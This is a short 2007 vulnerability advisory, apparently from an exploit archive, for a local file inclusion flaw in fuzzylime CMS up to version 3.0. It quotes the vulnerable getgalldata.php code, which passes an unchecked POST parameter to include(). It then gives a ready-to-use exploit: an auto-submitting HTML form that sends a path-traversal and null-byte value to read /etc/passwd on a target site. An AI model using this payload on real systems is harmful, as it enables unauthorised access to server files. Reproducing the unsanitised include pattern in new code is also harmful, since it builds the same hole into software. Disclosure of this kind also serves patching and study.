fuzzylime cms <= 3.0 Local File Inclusion Vulnerability

2007-09-08 00:00:00

########################################################################
#################
#
# not sec group
# http://www.notsec.com [email protected]
#
#
# [fuzzylime (cms) <= 3.0]
#
# Class: Local File Inclusion
# Found: 08/09/2007
# Site: http://cms.fuzzylime.co.uk/
#Download: http://cms.fuzzylime.co.uk/files/cms.zip
#Author: [wHITe_ShEEp] of notsec
#Contact: [email protected] - http://www.notsec.com
#
########################################################################
#################


vulnerable code:
[cms]/code/getgalldata.php
______________________________________________________

1: <?
2: $p = $_POST[p];
3: $m = $_POST[img];
4: $m = "e$m";
5: $entrytype = "gallery";
6: include "../gallery/$p.inc.php";
7: include "settings.inc.php";
8: include "../$admindir/languages/english.inc.php";
...
41: ?>
_______________________________________________________



Exploit: ( Work only with magic_quotes_gpc = Off )
_______________________________________________________

<html>
<body onload="document.myform.submit()">
<form name="myform" action="http://www.site.com/[fuzzylime]/code/
getgalldata.php" method="post">
<input name="p" type="text" size="30" value="../../../../../../../../
etc/passwd%00" />
</form>
</html>
________________________________________________________




Thanks to:
________________________________________________________

All notsec.com members;
R00T[ATI] for testing;
________________________________________________________

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.